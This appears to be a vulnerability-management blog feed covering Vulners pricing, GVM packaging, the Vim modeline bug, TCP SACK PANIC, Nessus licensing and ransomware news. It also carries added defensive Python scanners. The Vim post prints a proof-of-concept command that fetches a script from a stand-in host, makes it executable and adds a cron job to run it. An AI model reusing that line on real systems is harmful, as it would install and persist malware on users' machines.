I often hear from employees of large companies that they use Vulners for Vulnerability Management because it is free of charge. Well, strictly speaking, it is not.
In the footer of each Vulners.com page there is a link to the EULA. According to it, Vulners is free for personal, educational or research use. If you use Vulners at work to monitor your infrastructure or to get information about vulnerabilities, this is commercial usage and you have to pay.
How much? It's better to request the latest details from [email protected]. But currently the price starts from $150/month WITHOUT API usage and from $500/month for 10000 API calls. For $1000/month you can use the Vulners API without any restrictions.
Is this a lot? $6000/year ($500/month) is about twice the price of Nessus Professional. But compared with other enterprise Vulnerability Management solutions it's not really so much. For example, it's the price of Tenable.io for only 155 hosts. With the Vulners Linux API and some optimization, which I will describe later, it would be possible to cover MUCH more hosts and easily assess them on a daily basis.
What if you want to use the Vulners API for commercial purposes, but don't need so many API calls? Well, strictly speaking, such use without a commercial license would be a violation. But you will not be banned if you make fewer than 1000 requests per month. And, in general, the Vulners Team is loyal, doesn't ban such usage during a PoC, etc. Everything is discussable. But if you can pay, there is no reason why you shouldn't. Vulners is a small self-financing startup that does a lot of work with very limited resources. Commercial licenses really help to pay for servers and motivate the team to move on.
A little bit about the things I did on the weekend. I am still struggling with Ubuntu Linux packages for #OpenVAS10 (now the project is officially called GVM10). Actually, I already made the scripts that generate packages from the sources as a part of my Packabit project and generated the packages. But I still can't run GVM from them, openvassd in particular. I assume problems with the redis config, but maybe there is something else. If someone suddenly wants to give it a try and help with debugging - welcome!
So for now, I decided to check out what really works - the #GVM10 packages for Ubuntu from the Mohammad Razavi repository. I made bash scripts for #Vagrant that deploy 2 virtual machines in the same internal network:
1) vagrant_scan_target.sh - the script creates an outdated Ubuntu Linux host with the test_user/test_password account as a target for vulnerability scanning
2) vagrant_gvm_mrazavi.sh - the script creates an Ubuntu Linux host for installing GVM10 from the mrazavi packages and forwards TCP port 4000 for the GSA web interface
These #GVM10 packages have two main disadvantages: they were not built by me (a little bit of paranoia and a lot of desire to make my own changes in the OpenVAS code) and they require interactive installation. You need to click "Yes" several times. Therefore, after creating a Vagrant machine, you need to log in to it with vagrant ssh and execute the commands from gvm_mrazavi_commands.txt. GVM will be installed very quickly, in just a few minutes, and all GVM components can be managed comfortably as services. The new HTML5 interface is MUCH faster and better.
This latest Vim vulnerability is pretty cute. Technically, when a user opens a malformed file with Vim, a shell command embedded in the file is executed. This command can download something malicious, for example a cryptolocker, and then add a cron job to execute it at a convenient time. Anything!
For example,
echo ':!curl "https://dangerous-site.com/very_dangerous_script.sh" > /tmp/malscript.sh; chmod +x /tmp/malscript.sh; crontab -l > mycron; echo "* * * * * /tmp/malscript.sh" >> mycron; crontab mycron; rm mycron||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="' > test.txt
The only problem is that "Debian, Ubuntu, Gentoo, OSX, etc. by default disable modelines for security reasons". So this makes the vulnerability practically unexploitable in real life.
To check it in Ubuntu I needed to enable modelines in the global vimrc:
sudo vim /etc/vim/vimrc
...
set modeline
set modelines=5
...
I couldn't make it work with the current #Vim version in #CentOS 7.6.1810 with modeline set. Probably because the version is too old, "VIM - Vi IMproved 7.4". soji256 also couldn't run it in CentOS. So it seems that to be successfully attacked, the target CentOS user should install Vim from sources, but not the latest version, for example this one (I haven't checked it), and use it with modeline enabled. This is probably a pretty rare combination. But if you could run it with the default CentOS Vim, please let me know at @leonov_av, I'm curious.
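As an added example (not from the original post or the Vim project), here is a small Python scanner that flags modelines of the kind used in the PoC above: it looks only at the first and last five lines of a file, as Vim does, and reports modeline options that Vim evaluates as expressions (fde=, fdt=, stl=, ...) or whose value carries a source/command escape. The sample inputs are constructed; the malicious one reproduces the shape of the PoC with the shell payload replaced by a harmless echo.

```python
"""Flag Vim modelines that set expression-evaluated options.

Added example for this post, not code from the original or from the Vim
project. Vim reads modelines from the first and last 'modelines' (default 5)
lines of a file; the 2019 bug described above abused fde= (foldexpr) inside a
modeline to run ':source!' and escape the sandbox. This scanner flags any
modeline that sets an option Vim evaluates as an expression, or whose value
carries an obvious command/source escape. It is a triage heuristic, not a
full implementation of Vim's modeline grammar (escaped ':' and ' ' inside a
value are handled, nested quoting is not).
"""
import re
import sys
from typing import List, Tuple

MODELINES = 5  # Vim's default 'modelines' value

# Options whose value Vim evaluates as an expression (short and long names).
EXPR_OPTIONS = {
    "fde", "foldexpr", "fdt", "foldtext", "inde", "indentexpr",
    "inex", "includeexpr", "fex", "formatexpr", "stl", "statusline",
    "ruf", "rulerformat", "tal", "tabline",
}
# Substrings in a value that point at command execution.
SUSPICIOUS = ("source", "assert_fails", "system(", "execute(", ":!")

# Matches ' vi:', ' vim:', ' Vim:', ' ex:' and captures the option text.
MODELINE_RE = re.compile(r"(?:^|\s)(?:vi|vim|Vim|ex):\s*(.*)$")


def modeline_candidates(text: str, modelines: int = MODELINES) -> List[Tuple[int, str]]:
    """Return (line_number, option_text) for modelines in the head and tail."""
    lines = text.splitlines()
    head = range(min(modelines, len(lines)))
    tail = range(max(len(lines) - modelines, 0), len(lines))
    found = []
    for i in sorted(set(head) | set(tail)):
        m = MODELINE_RE.search(lines[i])
        if m:
            found.append((i + 1, m.group(1)))
    return found


def split_options(option_text: str) -> List[str]:
    """Split 'se[t] a b:' or 'a:b c' into individual option assignments."""
    m = re.match(r"se(?:t)?\s+(.*?)(?<!\\):", option_text)
    if m:
        option_text = m.group(1)
    # Separators are ':' or whitespace unless escaped with a backslash.
    return [o for o in re.split(r"(?<!\\)[:\s]+", option_text) if o]


def suspicious_options(options: List[str]) -> List[str]:
    """Keep assignments to expression options or with command-like values."""
    hits = []
    for opt in options:
        name, _, value = opt.partition("=")
        name = name.rstrip("+-^")  # normalise fde+=, fde^=, fde-= to fde
        if name in EXPR_OPTIONS or any(s in value for s in SUSPICIOUS):
            hits.append(opt)
    return hits


def scan(text: str) -> List[Tuple[int, str]]:
    """Return (line_number, option_assignment) pairs worth a closer look."""
    findings = []
    for lineno, option_text in modeline_candidates(text):
        for hit in suspicious_options(split_options(option_text)):
            findings.append((lineno, hit))
    return findings


# Constructed samples (not real captured files): a harmless modeline, and
# the shape of the 2019 PoC with the shell payload replaced by 'echo'.
BENIGN = "# vim: set ts=4 sw=4 et:\nprint('hello')\n"
MALICIOUS = (
    ':!echo pwned||" vi:fen:fdm=expr:'
    'fde=assert_fails("source\\!\\ \\%"):fdl=0:fdt="\n'
)

if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for lineno, opt in scan(fh.read()):
                print(f"{path}:{lineno}: suspicious modeline option {opt}")
```

Saved as, say, modeline_scan.py (a hypothetical name), it runs as python3 modeline_scan.py file1 file2 over files received from an untrusted source. It only tells you what Vim would see; the actual protection is still set nomodeline or an updated Vim.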
I usually don't write about politics here, but the latest scandal about US cyber attacks on the Russian Power Grid is pretty hilarious. OMG, who would have thought that Americans can do such creepy offensive stuff?! What a shock! What is most interesting, The New York Times writes about it, not RT or Sputnik. Now, according to Mr. President, the journalists of this newspaper "committed treason" and at the same time it's "also, not true". BTW, I thought calling citizens "the enemy of the people" was something from the Soviet era. In which direction are you guys moving?
Joking aside, I find it quite sick and dangerous. I don't like the rhetoric that if State A attacks the critical infrastructure of State B (first of all, what are the proofs? accurate attack attribution is almost impossible nowadays), State B should do the same to State A using undisclosed vulnerabilities and backdoors. It's not the "equivalent of land mines" at all, it's a full-scale offensive operation. At a minimum, this leads to the fragmentation of the global IT and InfoSecurity market and escalates the witch-hunt (#ERPScan, #Kaspersky, #Huawei, whatever is next). Just because you can no longer trust foreign vendors. Less competition means lower product quality and higher prices for the customers.
Yay. Now it's official: TCP SACK PANIC - Kernel vulnerabilities
CVE-2019-11477 - A sequence of SACKs may be crafted such that one can trigger an integer overflow, leading to a kernel panic.
CVE-2019-11478 - It is possible to send a crafted sequence of SACKs which will fragment the TCP retransmission queue.
CVE-2019-11479 - An attacker can force the Linux kernel to segment its responses into multiple TCP segments, each of which contains only 8 bytes of data. This drastically increases the bandwidth required to deliver the same amount of data.
Disable SACK processing (set /proc/sys/net/ipv4/tcp_sack to 0) or install the patches! Pretty simple DoS exploits for these vulnerabilities should appear soon...
#TCPSACKPANIC #Linux #Kernel #SACK
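As an added example (not from the original post or from any vendor), a Python triage helper that combines the two checks above: whether SACK processing is disabled, and whether the running kernel is at or above the stable release that carried the fix. The fixed-version table holds the stable releases that shipped the fix on 2019-06-17 (5.1.11, 4.19.52, 4.14.127, 4.9.182, 4.4.182); distribution kernels backport under their own version numbers (Ubuntu's 4.15.0-NN, for instance), so the helper reports a branch it does not know as unknown instead of guessing. The /proc paths are the standard ones; the release strings in the docstrings are constructed.

```python
"""Triage a host for the TCP SACK PANIC bugs (CVE-2019-11477/11478/11479).

Added example for this post, not code from the original or from any vendor.
Given a kernel release string and the live value of net.ipv4.tcp_sack, it
reports whether the host is mitigated, carries the upstream fix, or still
needs work. FIXED_UPSTREAM lists the stable releases that shipped the fix
on 2019-06-17; distribution kernels backport under their own numbering, so
a branch missing from the table is reported as 'unknown' rather than guessed.
"""
import re
from pathlib import Path
from typing import Tuple

FIXED_UPSTREAM = {
    (5, 1): (5, 1, 11),
    (4, 19): (4, 19, 52),
    (4, 14): (4, 14, 127),
    (4, 9): (4, 9, 182),
    (4, 4): (4, 4, 182),
}


def parse_release(release: str) -> Tuple[int, int, int]:
    """'4.19.50-1-amd64' -> (4, 19, 50); '5.1.0-rc3' -> (5, 1, 0)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def assess(release: str, tcp_sack: int) -> str:
    """Return a status starting with mitigated|patched|vulnerable|unknown."""
    if tcp_sack == 0:
        # Disabling SACK blocks the SACK-driven bugs (11477, 11478); 11479
        # (8-byte segments) does not depend on SACK and needs the MSS filter.
        return "mitigated: SACK disabled; still filter low MSS for CVE-2019-11479"
    ver = parse_release(release)
    fixed = FIXED_UPSTREAM.get(ver[:2])
    if fixed is None:
        return "unknown: branch not in the upstream table, check the distribution advisory"
    if ver >= fixed:
        return "patched: release is at or above the fixed upstream version"
    return "vulnerable: update the kernel, or set net.ipv4.tcp_sack=0 meanwhile"


def assess_local(proc_root: str = "/proc") -> str:
    """Assess the running host from the kernel release and the sysctl value."""
    root = Path(proc_root)
    release = (root / "sys/kernel/osrelease").read_text().strip()
    tcp_sack = int((root / "sys/net/ipv4/tcp_sack").read_text().strip())
    return assess(release, tcp_sack)


if __name__ == "__main__":
    print(assess_local())
```

The temporary mitigation is sysctl -w net.ipv4.tcp_sack=0 (persist it under /etc/sysctl.d/). CVE-2019-11479 does not depend on SACK; the advisory's workaround for it was to drop connections with a tiny MSS, for example iptables -A INPUT -p tcp -m tcpmss --mss 1:500 -j DROP. Disabling SACK costs throughput on lossy links, so treat it as a bridge to the patch, not a replacement.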
Vulnerability Management and more
BTW, do you think there will be a new massive malware attack soon similar to WannaCry, but with the use of latest RDP RCE vulnerability (CVE-2019-0708)? Let's say during next 30 days.
30 days have passed since the poll, and NO massive cyber attack based on the #BlueKeep vulnerability has occurred. What conclusions can we draw?
Well, it is very difficult to predict the real exploitability potential of a vulnerability based only on its description. Even if it is RCE, even if well-known vendors confirmed that they were able to write an exploit (but did not publish it), this does not guarantee that the vulnerability will be widely used in cyber attacks soon and that you should give it the highest priority in remediation.
That does not exclude the possibility that an RCE exploit for this vulnerability is currently being used in highly focused attacks, and the real action will occur with the leak of this exploit. Will it happen tomorrow? Who knows.
Three days ago NASA published a very interesting document, "Cybersecurity Management and Oversight at the Jet Propulsion Laboratory". Most media outlets mentioned it as "#NASA was hacked using #RaspberryPi". Yes, this is true, you can find information about this incident in the document by searching for "April 2018". But it's not even the most interesting part. There are many great and funny details about their CMDB-like system "Information Technology Security Database (ITSDB)", lack of network segmentation, unpatched vulnerabilities, etc. And all this in ordinary, not very formal language. It seems like a good example of how Information Security should be and should NOT be managed in a big organization, and awesome weekend reading.
A great set of Software Development tips "Things I Learnt The Hard Way (in 30 Years of Software Development)". The blog is about .Net and TDD (test-driven development), but the tips are quite universal. I totally agree with everything that I have read there, especially with the tips related to documentation and "be ready to throw your code away[...] Your code is not a wall: if you have to throw it always, it is not wasted material. Surely it means your time writing code was lost, but you got a better understanding about the problem now." I think such things should be taught in schools. It's really important for the right mindset.
I did not find this on Tenable's website, only in the blog post of the Russian distributor, but it seems that Nessus Professional 8.5, which will be released tomorrow, will behave differently after the license expiration. On the first day it will switch off all the scanning capabilities and plugin updates. Then within 30 days there will be an option to download existing scan results. After that all functions will be blocked. This is not good news because now any delay in license renewal, which happens in large organizations, will break the whole Vulnerability Management process completely.
The new price will be $2,390 per year, $2,190 for the renewal. There will also be small discounts for those who order licenses for 2 and 3 years (2.5% and 5%).
Currently my favorite city in the USA is Riviera Beach, Florida. The story is wonderful (pastebin for those who have problems with access to the site). The city administration was paralyzed by a #cryptolocker, because an employee of the local police department clicked on a malicious link in an email. And of course there were no backups. The situation is ordinary. But the decision is rather unusual: the city council decided to pay a ransom of $600,000 in Bitcoin to get their data back. Without any guarantee that the data will be decrypted and against the direct recommendations of the FBI.
There are no technical details, but if multiple servers were affected there must have been problems with network segmentation and unpatched servers (probably the lack of the MS17-010 patch). But none of these problems were mentioned in the media. In the media, council representatives say they need to buy new desktops, laptops and a backup system. With such an attitude, it probably won't be the last time they encounter such problems.
And, of course, the most intriguing question is whether or not they will pay the ransom and get the decryption key. If they spend so much money for nothing, it will be legendary!
PS: An interesting fact is that they actually bought a new backup system before the incident for $798,419, but it was not deployed on time. #ransomware
The vulnerability detection plugin vulners.nse is now part of Nmap, the most famous network scanner in the world! Officially! It took two years since the initial plugin release. Congratulations to the #Vulners Team! Great job!
Everything that I wrote earlier about the new behavior of #Nessus 8.5 after the license expiration, turned out to be true.
#Tenable also edited the GUI a little bit. They separated Report (HTML and CSV) and Export (Nessus v2 XML and Nessus DB). Now you can make a report for selected hosts or vulnerabilities in a more natural way. They also added these cool buttons to the scan results pages (they may have been added some versions before, but I didn't notice): you can snooze a vulnerability for some time, edit its criticality or even delete an entire host from the scan. And all this you can do for several selected vulnerabilities and hosts. Pretty cool.
They also switched off the limits for Host Discovery scans in Nessus Pro Eval and Nessus Essentials (!!). Well, for Nessus Pro Eval it's not so great, because we remember the time when there were no limits in the trial version at all. But it makes the free Nessus Essentials much more useful for organizations.
A few words about the Reuters "Yandex was hacked" article.
1. It is rather sad that a modern journalistic investigation may be based on some information from 4 anonymous sources without any proof. The only interesting details are: Western intelligence (yep, once again) as the attacker, Regin malware as the tool, network access for several weeks as the result, user authentication methods in the Yandex Email service as the goal. The representative of Yandex responded along the lines of "there was an attack at the end of 2018, but our IT security guys successfully dealt with it". So, there is nothing to discuss in any serious way.